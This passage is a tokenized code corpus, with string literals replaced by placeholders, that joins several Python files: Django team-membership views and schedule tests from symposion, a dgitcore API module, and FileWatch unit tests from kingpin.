"<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = team . slug ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_leave ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> if team . manager_access == Team . MEMBER_ACCESS_INVITATION and state is None and not request . user . is_staff : <EOL> raise Http404 ( ) <EOL> if team . can_leave ( request . user ) and request . method == "<STR_LIT:POST>" : <EOL> membership = Membership . objects . get ( team = team , user = request . user ) <EOL> membership . delete ( ) <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" ) <EOL> else : <EOL> return redirect ( "<STR_LIT>" , slug = team . slug ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_apply ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> if team . manager_access == Team . MEMBER_ACCESS_INVITATION and state is None and not request . user . is_staff : <EOL> raise Http404 ( ) <EOL> if team . can_apply ( request . user ) and request . method == "<STR_LIT:POST>" : <EOL> membership , created = Membership . objects . get_or_create ( team = team , user = request . user ) <EOL> membership . state = Membership . STATE_APPLIED <EOL> membership . save ( ) <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = team . slug ) <EOL> @ login_required <EOL> @ require_POST <EOL> def team_accept ( request , pk ) : <EOL> membership = get_object_or_404 ( Membership , pk = pk ) <EOL> if membership . accept ( by = request . user ) : <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = membership . team . slug ) <EOL> @ login_required <EOL> @ require_POST <EOL> def team_reject ( request , pk ) : <EOL> membership = get_object_or_404 ( Membership , pk = pk ) <EOL> if membership . reject ( by = request . user ) : <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = membership . team . slug ) <EOL> class TeamInviteView ( FormView ) : <EOL> http_method_names = [ "<STR_LIT>" ] <EOL> form_class = TeamInviteUserForm <EOL> @ method_decorator ( manager_required ) <EOL> def dispatch ( self , * args , ** kwargs ) : <EOL> self . team = self . request . team <EOL> return super ( TeamInviteView , self ) . dispatch ( * args , ** kwargs ) <EOL> def get_form_kwargs ( self ) : <EOL> form_kwargs = super ( TeamInviteView , self ) . get_form_kwargs ( ) <EOL> form_kwargs . update ( { "<STR_LIT>" : self . team } ) <EOL> return form_kwargs <EOL> def get_unbound_form ( self ) : <EOL> """<STR_LIT>""" <EOL> form_kwargs = self . get_form_kwargs ( ) <EOL> bound_fields = [ "<STR_LIT:data>" , "<STR_LIT>" ] <EOL> for field in bound_fields : <EOL> form_kwargs . pop ( field , None ) <EOL> return self . get_form_class ( ) ( ** form_kwargs ) <EOL> def after_membership_added ( self , form ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_form_success_data ( self , form ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : self . get_unbound_form ( ) , <EOL> "<STR_LIT>" : self . team <EOL> } , <EOL> context_instance = RequestContext ( self . request ) <EOL> ) <EOL> } <EOL> membership = self . membership <EOL> if membership is not None : <EOL> if membership . state == Membership . STATE_APPLIED : <EOL> fragment_class = "<STR_LIT>" <EOL> elif membership . state == Membership . STATE_INVITED : <EOL> fragment_class = "<STR_LIT>" <EOL> elif membership . state in ( Membership . STATE_AUTO_JOINED , Membership . STATE_ACCEPTED ) : <EOL> fragment_class = { <EOL> Membership . ROLE_OWNER : "<STR_LIT>" , <EOL> Membership . ROLE_MANAGER : "<STR_LIT>" , <EOL> Membership . ROLE_MEMBER : "<STR_LIT>" <EOL> } [ membership . role ] <EOL> data . update ( { <EOL> "<STR_LIT>" : { <EOL> fragment_class : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : self . team <EOL> } , <EOL> context_instance = RequestContext ( self . request ) <EOL> ) <EOL> } <EOL> } ) <EOL> return data <EOL> def form_valid ( self , form ) : <EOL> user_or_email = form . cleaned_data [ "<STR_LIT>" ] <EOL> role = form . cleaned_data [ "<STR_LIT>" ] <EOL> if isinstance ( user_or_email , string_types ) : <EOL> self . membership = self . team . invite_user ( self . request . user , user_or_email , role ) <EOL> else : <EOL> self . membership = self . team . add_user ( user_or_email , role , by = self . request . user ) <EOL> self . after_membership_added ( form ) <EOL> data = self . get_form_success_data ( form ) <EOL> return self . render_to_response ( data ) <EOL> def form_invalid ( self , form ) : <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( "<STR_LIT>" , { <EOL> "<STR_LIT>" : form , <EOL> "<STR_LIT>" : self . team <EOL> } , context_instance = RequestContext ( self . request ) ) <EOL> } <EOL> return self . render_to_response ( data ) <EOL> def render_to_response ( self , context , ** response_kwargs ) : <EOL> return JsonResponse ( context ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_revoke_invite ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . remove ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : "<STR_LIT>" <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_resend_invite ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . resend_invite ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : request . team <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_promote ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . promote ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : request . team <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_demote ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . demote ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : request . team <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_remove ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . remove ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : "<STR_LIT>" <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ team_required <EOL> @ login_required <EOL> def autocomplete_users ( request ) : <EOL> team = request . team <EOL> role = team . role_for ( request . user ) <EOL> if role not in [ Membership . ROLE_MANAGER , Membership . ROLE_OWNER ] : <EOL> raise Http404 ( ) <EOL> User = get_user_model ( ) <EOL> users = User . objects . exclude ( pk__in = [ <EOL> x . user . pk for x in team . memberships . exclude ( user__isnull = True ) <EOL> ] ) <EOL> q = request . GET . get ( "<STR_LIT>" ) <EOL> results = [ ] <EOL> if q : <EOL> results . extend ( [ <EOL> hookset . get_autocomplete_result ( x ) <EOL> for x in hookset . search_queryset ( q , users ) <EOL> ] ) <EOL> return HttpResponse ( json . dumps ( results ) , content_type = "<STR_LIT:application/json>" ) </s>
<s> from django import template <EOL> from symposion . proposals . models import AdditionalSpeaker <EOL> register = template . Library ( ) <EOL> class AssociatedProposalsNode ( template . Node ) : <EOL> @ classmethod <EOL> def handle_token ( cls , parser , token ) : <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) == <NUM_LIT:3> and bits [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> return cls ( bits [ <NUM_LIT:2> ] ) <EOL> else : <EOL> raise template . TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> def __init__ ( self , context_var ) : <EOL> self . context_var = context_var <EOL> def render ( self , context ) : <EOL> request = context [ "<STR_LIT>" ] <EOL> if request . user . speaker_profile : <EOL> pending = AdditionalSpeaker . SPEAKING_STATUS_ACCEPTED <EOL> speaker = request . user . speaker_profile <EOL> queryset = AdditionalSpeaker . objects . filter ( speaker = speaker , status = pending ) <EOL> context [ self . context_var ] = [ item . proposalbase for item in queryset ] <EOL> else : <EOL> context [ self . context_var ] = None <EOL> return u"<STR_LIT>" <EOL> class PendingProposalsNode ( template . Node ) : <EOL> @ classmethod <EOL> def handle_token ( cls , parser , token ) : <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) == <NUM_LIT:3> and bits [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> return cls ( bits [ <NUM_LIT:2> ] ) <EOL> else : <EOL> raise template . TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> def __init__ ( self , context_var ) : <EOL> self . context_var = context_var <EOL> def render ( self , context ) : <EOL> request = context [ "<STR_LIT>" ] <EOL> if request . user . speaker_profile : <EOL> pending = AdditionalSpeaker . SPEAKING_STATUS_PENDING <EOL> speaker = request . user . speaker_profile <EOL> queryset = AdditionalSpeaker . objects . filter ( speaker = speaker , status = pending ) <EOL> context [ self . context_var ] = [ item . proposalbase for item in queryset ] <EOL> else : <EOL> context [ self . context_var ] = None <EOL> return u"<STR_LIT>" <EOL> @ register . tag <EOL> def pending_proposals ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> return PendingProposalsNode . handle_token ( parser , token ) <EOL> @ register . tag <EOL> def associated_proposals ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> return AssociatedProposalsNode . handle_token ( parser , token ) </s>
<s> from datetime import date <EOL> from django . conf import settings <EOL> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase <EOL> from symposion . conference . models import Section , current_conference , Conference <EOL> from symposion . schedule . models import Day , Schedule , Session <EOL> class TestScheduleViews ( TestCase ) : <EOL> username = "<STR_LIT>" <EOL> first_name = "<STR_LIT>" <EOL> last_name = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . user = User . objects . create_user ( self . username , <EOL> password = "<STR_LIT>" , <EOL> email = self . username ) <EOL> self . user . first_name = self . first_name <EOL> self . user . last_name = self . last_name <EOL> self . user . save ( ) <EOL> def test_session_list ( self ) : <EOL> rsp = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( <NUM_LIT:200> , rsp . status_code ) <EOL> def test_session_staff_email ( self ) : <EOL> self . user . is_staff = True <EOL> self . user . save ( ) <EOL> assert self . client . login ( username = self . username , password = "<STR_LIT>" ) <EOL> url = reverse ( "<STR_LIT>" ) <EOL> rsp = self . client . get ( url ) <EOL> self . assertEqual ( <NUM_LIT:200> , rsp . status_code ) <EOL> def test_session_detail ( self ) : <EOL> Conference . objects . get_or_create ( id = settings . CONFERENCE_ID ) <EOL> section = Section . objects . create ( <EOL> conference = current_conference ( ) , <EOL> ) <EOL> schedule = Schedule . objects . create ( <EOL> section = section , <EOL> ) <EOL> day = Day . objects . create ( <EOL> schedule = schedule , <EOL> date = date . today ( ) , <EOL> ) <EOL> session = Session . objects . create ( <EOL> day = day , <EOL> ) <EOL> url = reverse ( "<STR_LIT>" , args = ( session . pk , ) ) <EOL> rsp = self . client . get ( url ) <EOL> self . assertEqual ( <NUM_LIT:200> , rsp . status_code ) </s>
<s> from django . contrib import admin <EOL> from reversion . admin import VersionAdmin <EOL> from symposion . teams . models import Team , Membership <EOL> admin . site . register ( Team , <EOL> prepopulated_fields = { "<STR_LIT>" : ( "<STR_LIT:name>" , ) } ) <EOL> class MembershipAdmin ( VersionAdmin ) : <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT:user>" , "<STR_LIT:state>" ] <EOL> list_filter = [ "<STR_LIT>" ] <EOL> search_fields = [ "<STR_LIT>" ] <EOL> admin . site . register ( Membership , MembershipAdmin ) </s>
<s> import os , sys <EOL> import dgitcore <EOL> from dgitcore import datasets , plugins , config <EOL> from dgitcore . config import get_config <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def api_call_action ( func ) : <EOL> """<STR_LIT>""" <EOL> def _inner ( * args , ** kwargs ) : <EOL> return func ( * args , ** kwargs ) <EOL> _inner . __name__ = func . __name__ <EOL> _inner . __doc__ = func . __doc__ <EOL> return _inner <EOL> def _reexport ( mod ) : <EOL> __all__ . extend ( mod . __all__ ) <EOL> for var in mod . __all__ : <EOL> base = getattr ( mod , var ) <EOL> f = api_call_action ( base ) <EOL> globals ( ) [ var ] = f <EOL> def initialize ( ) : <EOL> plugins . plugins_load ( ) <EOL> config . init ( ) <EOL> _reexport ( datasets ) <EOL> _reexport ( plugins ) </s>
<s> import os , sys <EOL> import json <EOL> from collections import namedtuple <EOL> import requests <EOL> Key = namedtuple ( "<STR_LIT>" , [ "<STR_LIT:name>" , "<STR_LIT:version>" ] ) <EOL> class TransformerBase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , version , description , supported = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . enable = '<STR_LIT:y>' <EOL> self . name = name <EOL> self . version = version <EOL> self . description = description <EOL> self . support = supported + [ name ] <EOL> self . initialize ( ) <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def autooptions ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def evaluate ( self , repo , spec , force , args ) : <EOL> """<STR_LIT>""" <EOL> return [ ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> import time <EOL> from unittest import TestCase <EOL> from kingpin . kazoo_utils . file_watch import FileWatch <EOL> class FileWatchTestCase ( TestCase ) : <EOL> def test_add_config_monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_add_serverset_monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( children ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = children <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ ] ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_config_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> watch . _check_file_updates ( ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_serverset_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( value ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> watch . _check_file_updates ( ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_config_content_not_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> old_update_time = os . path . getmtime ( tmp_file ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , old_update_time ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> new_update_time = os . path . getmtime ( tmp_file ) <EOL> self . assertNotEqual ( old_update_time , new_update_time ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , old_update_time ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_serverset_content_not_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( value ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> old_update_time = os . path . getmtime ( tmp_file ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> new_update_time = os . path . getmtime ( tmp_file ) <EOL> self . assertNotEqual ( old_update_time , new_update_time ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_config_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> times = <NUM_LIT:3> <EOL> expected_content = "<STR_LIT>" <EOL> for i in range ( times ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> new_line = new_content + str ( i ) + '<STR_LIT:\n>' <EOL> f = open ( tmp_file , '<STR_LIT:a>' ) <EOL> f . write ( new_line ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> expected_content += new_line <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , i + <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , expected_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_serverset_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( value ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> times = <NUM_LIT:3> <EOL> expected_content = [ ] <EOL> isFirst = True <EOL> for i in range ( times ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> new_line = new_content + str ( i ) <EOL> f = open ( tmp_file , '<STR_LIT:a>' ) <EOL> if isFirst : <EOL> isFirst = False <EOL> else : <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . write ( new_line ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> expected_content . append ( new_line ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , i + <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , expected_content ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_watchers_on_single_config ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data1 = [ <NUM_LIT:0> , None , None ] <EOL> def on_change1 ( value , stat ) : <EOL> test_data1 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data1 [ <NUM_LIT:1> ] = value <EOL> test_data1 [ <NUM_LIT:2> ] = stat . version <EOL> test_data2 = [ <NUM_LIT:0> , None , None ] <EOL> def on_change2 ( value , stat ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> test_data2 [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data1 [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data2 [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_watchers_on_single_serverset ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data1 = [ <NUM_LIT:0> , None ] <EOL> def on_change1 ( value ) : <EOL> test_data1 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data1 [ <NUM_LIT:1> ] = value <EOL> test_data2 = [ <NUM_LIT:0> , None ] <EOL> def on_change2 ( value ) : <EOL> test_data2 [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data2 [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change1 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> watch . add_watch ( tmp_file , on_change2 , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:2> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( 